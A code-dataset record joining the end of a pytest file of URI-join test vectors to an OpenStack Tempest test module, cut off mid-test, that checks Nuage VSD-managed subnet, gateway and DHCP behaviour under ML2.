        (b'./g', b'http://a/b/c/g'),
        (b'g/', b'http://a/b/c/g/'),
        (b'/g', b'http://a/g'),
        (b'//g', b'http://g'),
        (b'g?y', b'http://a/b/c/g?y'),
        (b'g?y/./x', b'http://a/b/c/g?y/./x'),
        (b'#s', b'http://a/b/c/d;p?q#s'),
        (b'g#s', b'http://a/b/c/g#s'),
        (b'g#s/./x', b'http://a/b/c/g#s/./x'),
        (b'g?y#s', b'http://a/b/c/g?y#s'),
        (b'g;x', b'http://a/b/c/g;x'),
        (b'g;x?y#s', b'http://a/b/c/g;x?y#s'),
        (b'.', b'http://a/b/c/'),
        (b'./', b'http://a/b/c/'),
        (b'..', b'http://a/b/'),
        (b'../', b'http://a/b/'),
        (b'../g', b'http://a/b/g'),
        (b'../..', b'http://a/'),
        (b'../../', b'http://a/'),
        (b'../../g', b'http://a/g'),
        (b'', b'http://a/b/c/d;p?q#f'),
        (b'g.', b'http://a/b/c/g.'),
        (b'.g', b'http://a/b/c/.g'),
        (b'g..', b'http://a/b/c/g..'),
        (b'..g', b'http://a/b/c/..g'),
        (b'./../g', b'http://a/b/g'),
        (b'./g/.', b'http://a/b/c/g/'),
        (b'g/./h', b'http://a/b/c/g/h'),
        (b'g/../h', b'http://a/b/c/h'),
    ]
}
# Extra (base, relative, expected) triples beyond the RFC tables; they
# are merged into uri_join below so the parametrized tests pick them up.
further = [
    (b'http://a/b/c/de', b';x', b'http://a/b/c/;x'),
    (b'a', b'b', b'b'), # don't duplicate filename
    #pytest.mark.xfail((b'http:///', b'..','http:///'), reason='The // is stripped due to normalization.'),
    (b'', b'http://a/b/c/g?y/./x', b'http://a/b/c/g?y/./x'),
    #pytest.mark.xfail((b'', b'http://a/./g', b'http://a/./g'), reason='The dot is stripped due to normalization'),
    (b'svn://pathtorepo/dir1', b'dir2', b'svn://pathtorepo/dir2'),
    (b'svn+ssh://pathtorepo/dir1', b'dir2', b'svn+ssh://pathtorepo/dir2'),
    (SIMPLE_BASE + b'/', b'foo', SIMPLE_BASE + b'/foo'),
    (b'http://a/b/c/d/e/', b'../../f/g/', b'http://a/b/c/f/g/'),
    (b'http://a/b/c/d/e', b'../../f/g/', b'http://a/b/f/g/'),
    (b'http://a/b/c/d/e/', b'/../../f/g/', b'http://a/f/g/'),
    (b'http://a/b/c/d/e', b'/../../f/g/', b'http://a/f/g/'),
    (b'http://a/b/c/d/e/', b'../../f/g', b'http://a/b/c/f/g'),
    (b'http://a/b/', b'../../f/g/', b'http://a/f/g/'),
]
for base, rel, abs_ in further:
    # setdefault: some bases already exist in uri_join, others are new.
    uri_join.setdefault(base, []).append((rel, abs_))
@pytest.mark.parametrize('base,relative,expected', [
    (base, rel, exp)
    for base, pairs in uri_join.items()
    for rel, exp in pairs
])
def test_uri_join(base, relative, expected):
    """Joining *relative* onto *base* yields the expected absolute URI."""
    resolved = URI(base).join(relative)
    assert resolved == expected
@pytest.mark.parametrize('base,relative,expected', [
    (base, rel, exp)
    for base, pairs in uri_join.items()
    for rel, exp in pairs
])
def test_uri_join_very_strict(base, relative, expected):
    """Byte-for-byte comparison of the joined URI with the expectation."""
    resolved = URI(base).join(relative)
    assert bytes(resolved) == bytes(expected)
#@pytest.mark.parametrize('expected,got,relative', [(expected, bytes(URI(base).join(relative)), relative) for base, relative_expected in uri_join.items() for (relative, expected) in relative_expected])
#def test_uri_join_very_strict(expected, got, relative):
# assert expected == got
| 34.050505
| 201
| 0.449125
| 1,529
| 6,742
| 1.954872
| 0.05036
| 0.274339
| 0.299097
| 0.309133
| 0.809301
| 0.787889
| 0.753095
| 0.745065
| 0.738374
| 0.6728
| 0
| 0.008918
| 0.118511
| 6,742
| 197
| 202
| 34.22335
| 0.494027
| 0.125334
| 0
| 0.725146
| 0
| 0
| 0.489029
| 0.023133
| 0
| 0
| 0
| 0
| 0.011696
| 1
| 0.011696
| false
| 0
| 0.017544
| 0
| 0.02924
| 0
| 0
| 0
| 1
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 12
|
f21be65a5e64a32fdb21a9ffd41e6ecaf97d9df3
| 34,586
|
py
|
Python
|
nuage_tempest_plugin/tests/api/vsd_managed/test_vsd_public_resources_ml2.py
|
nuagenetworks/nuage-tempest-plugin
|
ac1bfb0709c7bbaf04017af3050fb3ed1ad1324a
|
[
"Apache-1.1"
] | 1
|
2021-01-03T01:47:51.000Z
|
2021-01-03T01:47:51.000Z
|
nuage_tempest_plugin/tests/api/vsd_managed/test_vsd_public_resources_ml2.py
|
nuagenetworks/nuage-tempest-plugin
|
ac1bfb0709c7bbaf04017af3050fb3ed1ad1324a
|
[
"Apache-1.1"
] | null | null | null |
nuage_tempest_plugin/tests/api/vsd_managed/test_vsd_public_resources_ml2.py
|
nuagenetworks/nuage-tempest-plugin
|
ac1bfb0709c7bbaf04017af3050fb3ed1ad1324a
|
[
"Apache-1.1"
] | 1
|
2020-10-16T12:04:39.000Z
|
2020-10-16T12:04:39.000Z
|
# Copyright 2018 NOKIA
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from netaddr import IPNetwork
from tempest.lib import exceptions
from tempest.test import decorators
from nuage_tempest_plugin.lib.test import nuage_test
from nuage_tempest_plugin.lib.test import tags
from nuage_tempest_plugin.lib.topology import Topology
from nuage_tempest_plugin.tests.api.vsd_managed \
import base_vsd_managed_networks
from nuage_tempest_plugin.tests.api.vsd_managed \
import base_vsd_public_resources
# Usable host addresses in a /24 allocation pool.
OS_FULL_CIDR24_RANGE = 254  # .256 -1 (.0) -1 (.255)
# CIDR/gateway/DHCP-option-3 values for the managed L2 shared domain.
VSD_L2_SHARED_MGD_OPT3_CIDR = IPNetwork('21.21.21.0/24')
VSD_L2_SHARED_MGD_OPT3_GW = '21.21.21.1'
VSD_L2_SHARED_MGD_OPT3 = '21.21.21.121'
# CIDR/gateway/DHCP-option-3 values for the managed L3 shared domain.
VSD_L3_SHARED_MGD_OPT3_CIDR = IPNetwork('31.31.31.0/24')
VSD_L3_SHARED_MGD_OPT3_GW = '31.31.31.1'
VSD_L3_SHARED_MGD_OPT3 = '31.31.31.131'
#
# Arbitrary valid CIDR/gateway used where the exact range doesn't matter.
VALID_CIDR = IPNetwork('3.22.111.0/24')
VALID_CIDR_GW = '3.22.111.1'
#
# Expected error-message fragments for negative tests.
EXPECT_DHCP_ENABLE_TRUE = "enable_dhcp in subnet must be True"
EXPECT_DHCP_ENABLE_FALSE = "enable_dhcp in subnet must be False"
EXPECT_CIDRS_DO_NOT_MATCH = "do not match"
EXPECT_GATEWAY_IN_CIDR = "Invalid input for operation: " \
                         "Gateway is not valid on subnet."
@nuage_test.class_header(tags=[tags.ML2, tags.VSD_MANAGED])
class VSDPublicResourcesML2Test(
        base_vsd_public_resources.BaseVSDPublicResources):
    # These tests use non-shared OpenStack networks.
    os_shared_network = False
    # Release-dependent expectations: the tests below expect the
    # network:dhcp:nuage port to exist only from Newton onwards.
    # NOTE(review): failure_type is presumably consumed by the base-class
    # helpers for negative cases — confirm against the base class.
    if Topology.before_openstack('Newton'):
        failure_type = exceptions.ServerFault
        dhcp_port = False
    else:
        failure_type = exceptions.BadRequest
        dhcp_port = True
@classmethod
def skip_checks(cls):
    """Skip the whole class unless the ML2 plugin is in use."""
    super(VSDPublicResourcesML2Test, cls).skip_checks()
    if not Topology.is_ml2:
        raise cls.skipException('Skipping ml2 tests with '
                                'nuage-core plugin')
@nuage_test.header()
def test_vsd_l2_shared_unmgd_l2_unmgd_without_gw_ip(self):
    """OS subnet without gateway IP on a fully unmanaged L2 pair."""
    # Given I have a VSD-L2-domain without IPAM (i.e. UnManaged)
    # And I have a VSD-L2-Shared-domain without IPAM (i.e. UnManaged)
    # and these are linked
    vsd_l2dom_unmgd = self._given_vsdl2sharedunmgd_lnkd_to_vsdl2domunmgd()
    self._check_vsd_l2_shared_l2_unmgd(
        vsd_l2dom_unmgd=vsd_l2dom_unmgd,
        # When I create an OS subnet with
        #   enable_dhcp == False
        #   a valid CIDR
        #   nuagenet == UUID of VSD-L2-domain
        #   no IP
        os_shared_network=self.os_shared_network,
        enable_dhcp=False,
        cidr=VALID_CIDR,
        gateway_ip='',
        # Then the OS subnet has
        #   an OS allocation pool covering the full CIDR range
        #   gateway_ip equal to None
        expected_gateway_ip=None,
        # and has no network:dhcp:nuage port
        expect_network_dhcp_nuage_port=False,
        # When I spin a VM in this network
        # Then the OS VM-IP-address is in the valid CIDR range
        # And the VM-interface-IP-address in the VSD-L2-domain is empty
        expect_vm_ip_addresses_equal=''
    )
@nuage_test.header()
def test_vsd_l2_shared_unmgd_l2_unmgd_with_gw_ip_neg(self):
    """Gateway IP on a fully unmanaged L2 pair is silently dropped."""
    # Pass on liberty, fail on kilo
    # Given I have a VSD-L2-domain without IPAM (i.e. UnManaged)
    # And I have a VSD-L2-Shared-domain without IPAM (i.e. UnManaged)
    # and these are linked
    vsd_l2dom_unmgd = self._given_vsdl2sharedunmgd_lnkd_to_vsdl2domunmgd()
    self._check_vsd_l2_shared_l2_unmgd(
        vsd_l2dom_unmgd=vsd_l2dom_unmgd,
        # When I create an OS subnet with
        #   enable_dhcp == False
        #   a valid CIDR
        #   nuagenet == UUID of VSD-L2-domain
        os_shared_network=self.os_shared_network,
        enable_dhcp=False,
        gateway_ip=VALID_CIDR_GW,
        cidr=VALID_CIDR,
        # Then the OS subnet has
        #   an OS allocation pool covering the full CIDR range
        #   gateway_ip equal to None
        expected_gateway_ip=None,
        # and no network:dhcp:nuage port
        expect_network_dhcp_nuage_port=False,
        # When I spin a VM in this network
        # Then the OS VM-IP-address is in the valid CIDR range
        # And the VM-interface-IP-address in the VSD-L2-domain is empty
        expect_vm_ip_addresses_equal=''
    )
@nuage_test.header()
def test_vsd_l2_shared_unmgd_l2_unmgd_no_gateway(self):
    """OS subnet created with --no-gateway on an unmanaged L2 pair."""
    # Given I have a VSD-L2-domain without IPAM (i.e. UnManaged)
    # And I have a VSD-L2-Shared-domain without IPAM (i.e. UnManaged)
    # And these are linked
    vsd_l2dom_unmgd = self._given_vsdl2sharedunmgd_lnkd_to_vsdl2domunmgd()
    self._check_vsd_l2_shared_l2_unmgd(
        vsd_l2dom_unmgd=vsd_l2dom_unmgd,
        # When I create an OS subnet with
        #   enable_dhcp == False
        #   a valid CIDR
        #   nuagenet == UUID of VSD-L2-domain
        #   no-gateway
        os_shared_network=self.os_shared_network,
        enable_dhcp=False,
        cidr=VALID_CIDR,
        gateway_ip=None,
        # Then the OS subnet has
        #   gateway_ip equal to None
        expected_gateway_ip=None,
        # and no network:dhcp:nuage port
        expect_network_dhcp_nuage_port=False,
        # When I spin a VM in this network
        # Then the OS VM-IP-address is in the valid CIDR range
        # And the VM-interface-IP-address in the VSD-L2-domain is empty
        expect_vm_ip_addresses_equal=''
    )
@nuage_test.header()
def test_vsd_l2_shared_mgd_l2_unmgd_without_gateway(self):
    """DHCP-enabled OS subnet, no gateway IP, on a managed shared L2."""
    # Given I have a VSD-L2-domain without IPAM (i.e. UnManaged)
    # And I have a VSD-L2-Shared-domain with IPAM (i.e. managed)
    # And these are linked
    # (comment fixed: the shared domain here is managed — see the
    #  helper name below)
    vsd_l2dom_unmgd = self._given_vsdl2sharedmgd_lnkd_to_vsdl2domunmgd()
    self._check_vsd_l2_shared_l2_unmgd(
        vsd_l2dom_unmgd=vsd_l2dom_unmgd,
        # When I create an OS subnet with
        #   enable_dhcp == True (comment fixed to match the code)
        #   CIDR == CIDR of VSD-L2-Shared-domain
        #   nuagenet == UUID of VSD-L2-domain
        os_shared_network=self.os_shared_network,
        enable_dhcp=True,
        cidr=base_vsd_managed_networks.VSD_L2_SHARED_MGD_CIDR,
        gateway_ip='',
        # Then the OS subnet has
        #   gateway_ip equal to None
        expected_gateway_ip=None,
        # and network:dhcp:nuage port exist from Newton onwards
        expect_network_dhcp_nuage_port=self.dhcp_port,
        # When I spin a VM in this network
        # Then the OS VM-IP-address is in the valid CIDR range
        # And the VM-interface-IP-address in the VSD-L2-domain equals
        # the OS VM-IP-address
        expect_vm_ip_addresses_equal=True
    )
@decorators.attr(type=['negative'])
@nuage_test.header()
def test_vsd_l2_shared_mgd_l2_unmgd_with_gw_neg(self):
    """Gateway IP on a managed shared L2: fails on kilo, passes later."""
    # Given I have a VSD-L2-domain without IPAM (i.e. unmanaged)
    # And I have a VSD-L2-Shared-domain with IPAM (i.e. managed)
    # And these are linked
    vsd_l2dom_unmgd = self._given_vsdl2sharedmgd_lnkd_to_vsdl2domunmgd()
    if Topology.at_openstack('kilo'):
        # Kilo: subnet creation is rejected server-side.
        self.assertRaisesRegex(
            exceptions.ServerFault,
            "create_subnet_postcommit failed.",
            self._check_vsd_l2_shared_l2_unmgd,
            vsd_l2dom_unmgd=vsd_l2dom_unmgd,
            os_shared_network=self.os_shared_network,
            enable_dhcp=True,
            cidr=base_vsd_managed_networks.VSD_L2_SHARED_MGD_CIDR,
            gateway_ip=base_vsd_managed_networks.VSD_L2_SHARED_MGD_GW,
            expect_network_dhcp_nuage_port=False,
            expected_gateway_ip=None,
            expect_vm_ip_addresses_equal=True
        )
    else:
        # In ML2 Liberty this is not a negative test so it should pass
        self._check_vsd_l2_shared_l2_unmgd(
            vsd_l2dom_unmgd=vsd_l2dom_unmgd,
            # When I create an OS subnet with
            #   enable_dhcp == True (comment fixed to match the code)
            #   CIDR of the VSD-L2-Shared-domain
            #   nuagenet == UUID of VSD-L2-domain
            os_shared_network=self.os_shared_network,
            enable_dhcp=True,
            cidr=base_vsd_managed_networks.VSD_L2_SHARED_MGD_CIDR,
            gateway_ip=base_vsd_managed_networks.VSD_L2_SHARED_MGD_GW,
            # Then the OS subnet has
            #   gateway_ip equal to None
            expected_gateway_ip=None,
            # and the network:dhcp:nuage port per release expectation
            expect_network_dhcp_nuage_port=self.dhcp_port,
            # When I spin a VM in this network
            # Then the OS VM-IP-address is in the valid CIDR range
            # And the VM-interface-IP-address in the VSD-L2-domain equals
            # the OS VM-IP-address
            expect_vm_ip_addresses_equal=True
        )
@nuage_test.header()
def test_vsd_l2_shared_mgd_l2_unmgd_no_gateway(self):
    """--no-gateway OS subnet on a managed shared L2 domain."""
    # Given I have a VSD-L2-domain without IPAM (i.e. unmanaged)
    # And I have a VSD-L2-Shared-domain with IPAM (i.e. managed)
    # And these are linked
    vsd_l2dom_unmgd = self._given_vsdl2sharedmgd_lnkd_to_vsdl2domunmgd()
    self._check_vsd_l2_shared_l2_unmgd(
        vsd_l2dom_unmgd=vsd_l2dom_unmgd,
        # When I create an OS subnet with
        #   enable_dhcp == True
        #   CIDR == CIDR of VSD-L2-Shared-domain
        #   nuagenet == UUID of VSD-L2-domain
        #   no-gateway
        os_shared_network=self.os_shared_network,
        enable_dhcp=True,
        cidr=base_vsd_managed_networks.VSD_L2_SHARED_MGD_CIDR,
        gateway_ip=None,
        # Then the OS subnet has
        #   gateway_ip equal to None
        expected_gateway_ip=None,
        # and the network:dhcp:nuage port per release expectation
        expect_network_dhcp_nuage_port=self.dhcp_port,
        # When I spin a VM in this network
        # Then the OS VM-IP-address is in the CIDR range
        # And the VM-interface-IP-address in the VSD-L2-domain equals
        # the OS VM-IP-address
        expect_vm_ip_addresses_equal=True
    )
@nuage_test.header()
def test_vsd_l2_shared_mgd_opt3_l2_unmgd_without_gw_neg(self):
    """Empty gateway IP must fail when DHCP-option-3 is set on VSD."""
    # NOTE(review): other *_neg tests carry
    # @decorators.attr(type=['negative']) — possibly missing here.
    # Given I have a VSD-L2-domain without IPAM (i.e. unmanaged)
    # And I have a VSD-L2-Shared-domain with IPAM (i.e. managed)
    # with DHCP-option 3 set
    # And these are linked
    vsd_l2dom_unmgd = \
        self._given_vsdl2sharedmgdopt3_linked_to_vsdl2domunmgd(
            VSD_L2_SHARED_MGD_OPT3)
    self._create_vsd_mgd_subnet(
        vsd_l2dom_unmgd,
        os_shared_network=self.os_shared_network,
        enable_dhcp=True,
        cidr=VSD_L2_SHARED_MGD_OPT3_CIDR,
        gateway_ip='',  # bad, must be VSD_L2_SHARED_MGD_OPT3
        must_fail=True)
@nuage_test.header()
def test_vsd_l2_shared_mgd_opt3_l2_unmgd_with_gateway(self):
    """Gateway IP matching DHCP-option-3 is accepted and reflected."""
    # Given I have a VSD-L2-domain without IPAM (i.e. unmanaged)
    # And I have a VSD-L2-Shared-domain with IPAM (i.e. managed)
    # with DHCP-option 3 set
    # and these are linked
    vsd_l2dom_unmgd = \
        self._given_vsdl2sharedmgdopt3_linked_to_vsdl2domunmgd(
            VSD_L2_SHARED_MGD_OPT3)
    self._check_vsd_l2_shared_l2_unmgd(
        vsd_l2dom_unmgd=vsd_l2dom_unmgd,
        # When I create an OS subnet with
        #   enable_dhcp == True
        #   CIDR == CIDR of VSD-L2-Shared-domain
        #   nuagenet == UUID of VSD-L2-domain
        #   gateway-ip == gateway-ip in DHCP-option-3
        os_shared_network=self.os_shared_network,
        enable_dhcp=True,
        cidr=VSD_L2_SHARED_MGD_OPT3_CIDR,
        gateway_ip=VSD_L2_SHARED_MGD_OPT3,
        # Then the OS subnet has
        #   gateway_ip equal to DHCP-options-3 of VSD-L2-Shared-domain
        expected_gateway_ip=VSD_L2_SHARED_MGD_OPT3,
        # and network:dhcp:nuage port exist from Newton onwards
        expect_network_dhcp_nuage_port=self.dhcp_port,
        # When I spin a VM in this network
        # Then the OS VM-IP-address is in the CIDR range
        # And the VM-interface-IP-address in the VSD-L2-domain equals
        # the OS VM-IP-address
        expect_vm_ip_addresses_equal=True
    )
@nuage_test.header()
@decorators.attr(type=['negative'])
def test_vsd_l2_shared_mgd_opt3_l2_unmgd_no_gateway(self):
    """--no-gateway must fail when DHCP-option-3 is set on VSD."""
    # Given I have a VSD-L2-domain without IPAM (i.e. unmanaged)
    # And I have a VSD-L2-Shared-domain with IPAM (i.e. managed)
    # with DHCP-option 3 set
    # and these are linked
    # Then I expect a failure from OS
    # Supported only when dhcp_option-3 is NOT set
    vsd_l2dom_unmgd = \
        self._given_vsdl2sharedmgdopt3_linked_to_vsdl2domunmgd(
            VSD_L2_SHARED_MGD_OPT3)
    self._create_vsd_mgd_subnet(
        vsd_l2dom_unmgd,
        os_shared_network=self.os_shared_network,
        enable_dhcp=True,
        cidr=VSD_L2_SHARED_MGD_OPT3_CIDR,
        gateway_ip=None,  # bad, must be VSD_L2_SHARED_MGD_OPT3
        must_fail=True)
@nuage_test.header()
def test_vsd_l3_shared_mgd_l3_unmgd_without_gateway(self):
    """Empty gateway IP on a managed shared L3: VSD gateway is used."""
    # Given I have a VSD-L3-domain in a public zone
    # (i.e. without IPAM (/ UnManaged)
    # And I have a VSD-L3-Shared-domain with IPAM (i.e. Managed)
    # and these are linked
    vsd_l3_unmgd_subnet = \
        self._given_vsdl3sharedmgd_lnkd_to_vsdl2subnetunmgd()
    self._check_vsd_l3_shared_l2_unmgd(
        # When I create an OS subnet with
        #   enable_dhcp == True
        #   CIDR == CIDR of VSD-L3-Shared-domain
        #   nuagenet == UUID of VSD-L3-domain-public-zone-subnet
        vsd_l3_dom_subnet=vsd_l3_unmgd_subnet,
        os_shared_network=self.os_shared_network,
        enable_dhcp=True,
        cidr=base_vsd_managed_networks.VSD_L3_SHARED_MGD_CIDR,
        gateway_ip='',
        # Then the OS subnet has
        #   gateway_ip equal to gateway-ip of VSD-L3-Shared-domain
        expected_gateway_ip=base_vsd_managed_networks.VSD_L3_SHARED_MGD_GW,
        # and network:dhcp:nuage port exist from Newton onwards
        expect_network_dhcp_nuage_port=self.dhcp_port,
        # When I spin a VM in this network
        # Then the OS VM-IP-address is in the CIDR range
        # And the VM-interface-IP-address in the VSD-L3-domain equals
        # the OS VM-IP-address
        # And the VM-interface-IP-address is different from the
        # gateway_ip address
        expect_vm_ip_addresses_equal=True
    )
@nuage_test.header()
@decorators.attr(type='smoke')
def test_vsd_l3_shared_mgd_l3_unmgd_with_gateway(self):
    """Explicit gateway IP equal to the VSD L3 gateway is accepted."""
    # Given I have a VSD-L3-domain without IPAM (i.e. UnManaged)
    # And I have a VSD-L3-Shared-domain with IPAM (i.e. Managed)
    # and these are linked
    vsd_l3_unmgd_subnet = \
        self._given_vsdl3sharedmgd_lnkd_to_vsdl2subnetunmgd()
    self._check_vsd_l3_shared_l2_unmgd(
        vsd_l3_dom_subnet=vsd_l3_unmgd_subnet,
        os_shared_network=self.os_shared_network,
        # When I create an OS subnet with
        #   enable_dhcp == True
        #   CIDR == CIDR of VSD-L3-Shared-domain
        #   nuagenet == UUID of VSD-L3-domain
        #   gateway-ip == gateway-ip of VSD-L3-Shared-domain
        enable_dhcp=True,
        cidr=base_vsd_managed_networks.VSD_L3_SHARED_MGD_CIDR,
        gateway_ip=base_vsd_managed_networks.VSD_L3_SHARED_MGD_GW,
        # Then the OS subnet has
        #   gateway_ip equal to gateway-ip of VSD-L3-Shared-domain
        expected_gateway_ip=base_vsd_managed_networks.VSD_L3_SHARED_MGD_GW,
        # and network:dhcp:nuage port exist from Newton onwards
        expect_network_dhcp_nuage_port=self.dhcp_port,
        #
        # When I spin a VM in this network
        # Then the OS VM-IP-address is in the CIDR range
        # And the VM-interface-IP-address in the VSD-L3-domain equals
        # the OS VM-IP-address
        # And the OS VM-IP-address is different from the gateway-ip
        expect_vm_ip_addresses_equal=True
    )
@nuage_test.header()
def test_vsd_l3_shared_mgd_l3_unmgd_no_gateway_neg(self):
    """--no-gateway must fail on a managed shared L3 domain."""
    # NOTE(review): other *_neg tests carry
    # @decorators.attr(type=['negative']) — possibly missing here.
    # Given I have a VSD-L3-domain without IPAM (i.e. UnManaged)
    # And I have a VSD-L3-Shared-domain with IPAM (i.e. Managed)
    # and these are linked
    vsd_l3_unmgd_subnet = \
        self._given_vsdl3sharedmgd_lnkd_to_vsdl2subnetunmgd()
    self._create_vsd_mgd_subnet(
        vsd_l3_unmgd_subnet,
        os_shared_network=self.os_shared_network,
        enable_dhcp=True,
        # NOTE(review): this L3 test passes the *L2* opt-3 CIDR —
        # verify this is intentional (the subnet is expected to fail).
        cidr=VSD_L2_SHARED_MGD_OPT3_CIDR,
        gateway_ip=None,  # bad, must be <base>.VSD_L3_SHARED_MGD_GW
        must_fail=True)
@nuage_test.header()
def test_vsd_l3_shared_mgd_opt3_l2_unmgd_with_gateway(self):
    """Gateway IP on a managed shared L3 domain with DHCP-option-3."""
    # Given I have a VSD-L3-domain without IPAM (i.e. UnManaged)
    # And I have a VSD-L3-Shared-domain with IPAM (i.e. Managed)
    # with DHCP-options-3
    # and these are linked
    vsd_l3_unmgd_subnet = \
        self._given_vsdl3sharedmgdopt3_linked_to_vsdl3subnetunmgd(
            VSD_L3_SHARED_MGD_OPT3)
    self._check_vsd_l3_shared_l2_unmgd(
        vsd_l3_dom_subnet=vsd_l3_unmgd_subnet,
        os_shared_network=self.os_shared_network,
        # When I create an OS subnet with
        #   enable_dhcp == True
        #   CIDR == CIDR of VSD-L3-Shared-domain
        #   nuagenet == UUID of VSD-L3-domain
        #   gateway-ip == gateway-ip of VSD-L3-Shared-domain
        enable_dhcp=True,
        cidr=VSD_L3_SHARED_MGD_OPT3_CIDR,
        gateway_ip=VSD_L3_SHARED_MGD_OPT3_GW,
        # Then the OS subnet has
        #   an OS allocation pool covering the full CIDR range
        #   (except the GW-ip)
        #   gateway_ip equal to gateway-ip of VSD-L3-Shared-domain
        expected_gateway_ip=VSD_L3_SHARED_MGD_OPT3_GW,
        # and network:dhcp:nuage port exist from Newton onwards
        expect_network_dhcp_nuage_port=self.dhcp_port,
        # When I spin a VM in this network
        # Then the OS VM-IP-address is in the CIDR range
        # And the VM-interface-IP-address in the VSD-L3-domain equals
        # the OS VM-IP-address
        # And the OS VM-IP-address is different from the gateway-ip
        expect_vm_ip_addresses_equal=True
    )
def test_vsd_l3_shared_mgd_opt3_0000_l2_unmgd_with_gateway(self):
    """Same as the opt-3 gateway test, but DHCP-option-3 is 0.0.0.0."""
    # NOTE(review): unlike its siblings this test has no
    # @nuage_test.header() decorator — possibly an omission.
    # Given I have a VSD-L3-domain without IPAM (i.e. UnManaged)
    # And I have a VSD-L3-Shared-domain with IPAM (i.e. Managed)
    # with DHCP-options-3 0.0.0.0
    # and these are linked
    vsd_l3_unmgd_subnet = \
        self._given_vsdl3sharedmgdopt3_linked_to_vsdl3subnetunmgd(
            dhcp_option_3='0.0.0.0')
    self._check_vsd_l3_shared_l2_unmgd(
        vsd_l3_dom_subnet=vsd_l3_unmgd_subnet,
        os_shared_network=self.os_shared_network,
        # When I create an OS subnet with
        #   enable_dhcp == True
        #   CIDR == CIDR of VSD-L3-Shared-domain
        #   nuagenet == UUID of VSD-L3-domain
        #   gateway-ip == gateway-ip of VSD-L3-Shared-domain
        enable_dhcp=True,
        cidr=VSD_L3_SHARED_MGD_OPT3_CIDR,
        gateway_ip=VSD_L3_SHARED_MGD_OPT3_GW,
        # Then the OS subnet has
        #   an OS allocation pool covering the full CIDR range
        #   (except the GW-ip)
        #   gateway_ip equal to gateway-ip of VSD-L3-Shared-domain
        expected_gateway_ip=VSD_L3_SHARED_MGD_OPT3_GW,
        # and network:dhcp:nuage port exist from Newton onwards
        expect_network_dhcp_nuage_port=self.dhcp_port,
        # When I spin a VM in this network
        # Then the OS VM-IP-address is in the CIDR range
        # And the VM-interface-IP-address in the VSD-L3-domain equals
        # the OS VM-IP-address
        # And the OS VM-IP-address is different from the gateway-ip
        expect_vm_ip_addresses_equal=True,
    )
# #########################################################################
# # Negative testcases
# #########################################################################
@decorators.attr(type=['negative'])
@nuage_test.header()
def test_vsd_l2_shared_unmgd_l2_unmgd_wo_gw_enable_dhcp_neg(
        self):
    """Enabling DHCP must fail when the linked shared L2 is unmanaged."""
    # Given I have a VSD-L2-domain without IPAM (i.e. unmanaged)
    # And I have a VSD-L2-Shared-domain without IPAM (i.e. UnManaged)
    # And these are linked
    vsd_l2dom = self._given_vsdl2sharedunmgd_lnkd_to_vsdl2domunmgd()
    self._create_vsd_mgd_subnet(
        vsd_l2dom,
        os_shared_network=self.os_shared_network,
        enable_dhcp=True,  # bad
        cidr=VALID_CIDR,  # any CIDR, doesn't matter
        gateway_ip='',
        must_fail=True)
@decorators.attr(type=['negative'])
@nuage_test.header()
def test_vsd_l2_shared_mgd_l2_unmgd_wo_gw_no_dhcp_neg(self):
    """Disabling DHCP must fail when the linked shared L2 is managed."""
    # Given I have a VSD-L2-domain without IPAM (i.e. unmanaged)
    # And I have a VSD-L2-Shared-domain with IPAM (i.e. managed)
    # And these are linked
    vsd_l2dom = self._given_vsdl2sharedmgd_lnkd_to_vsdl2domunmgd()
    self._create_vsd_mgd_subnet(
        vsd_l2dom,
        os_shared_network=self.os_shared_network,
        enable_dhcp=False,  # bad
        cidr=base_vsd_managed_networks.VSD_L2_SHARED_MGD_CIDR,
        gateway_ip='',
        must_fail=True)
@decorators.attr(type=['negative'])
@nuage_test.header()
def test_vsd_l2_shared_mgd_l2_unmgd_with_gw_no_dhcp_neg(self):
    """DHCP off + explicit gateway must fail on a managed shared L2."""
    # Given I have a VSD-L2-domain without IPAM (i.e. unmanaged)
    # And I have a VSD-L2-Shared-domain with IPAM (i.e. managed)
    # And these are linked
    vsd_l2dom = self._given_vsdl2sharedmgd_lnkd_to_vsdl2domunmgd()
    self._create_vsd_mgd_subnet(
        vsd_l2dom,
        os_shared_network=self.os_shared_network,
        enable_dhcp=False,  # bad
        cidr=base_vsd_managed_networks.VSD_L2_SHARED_MGD_CIDR,
        gateway_ip=base_vsd_managed_networks.VSD_L2_SHARED_MGD_GW,
        must_fail=True)
@decorators.attr(type=['negative'])
@nuage_test.header()
def test_vsd_l2_shared_mgd_l2_unmgd_no_gw_no_dhcp_neg(self):
    """DHCP off + --no-gateway must fail on a managed shared L2."""
    # Given I have a VSD-L2-domain without IPAM (i.e. unmanaged)
    # And I have a VSD-L2-Shared-domain with IPAM (i.e. managed)
    # And these are linked
    vsd_l2dom = self._given_vsdl2sharedmgd_lnkd_to_vsdl2domunmgd()
    self._create_vsd_mgd_subnet(
        vsd_l2dom,
        os_shared_network=self.os_shared_network,
        enable_dhcp=False,  # bad
        cidr=base_vsd_managed_networks.VSD_L2_SHARED_MGD_CIDR,
        gateway_ip=None,
        must_fail=True)
@decorators.attr(type=['negative'])
@nuage_test.header()
def test_vsd_l2_shared_mgd_l2_unmgd_wo_gw_cidr_mismatch_neg(self):
    """CIDR not matching the managed shared L2 domain must fail."""
    # Given I have a VSD-L2-domain without IPAM (i.e. unmanaged)
    # And I have a VSD-L2-Shared-domain with IPAM (i.e. managed)
    # And these are linked
    vsd_l2dom = self._given_vsdl2sharedmgd_lnkd_to_vsdl2domunmgd()
    self._create_vsd_mgd_subnet(
        vsd_l2dom,
        os_shared_network=self.os_shared_network,
        enable_dhcp=True,
        cidr=VALID_CIDR,  # bad
        gateway_ip='',
        must_fail=True)
@decorators.attr(type=['negative'])
@nuage_test.header()
def test_vsd_l2_shared_mgd_l2_unmgd_with_gw_cidr_mismatch_neg(self):
    """Mismatching CIDR with an explicit gateway must also fail."""
    # Given I have a VSD-L2-domain without IPAM (i.e. unmanaged)
    # And I have a VSD-L2-Shared-domain with IPAM (i.e. managed)
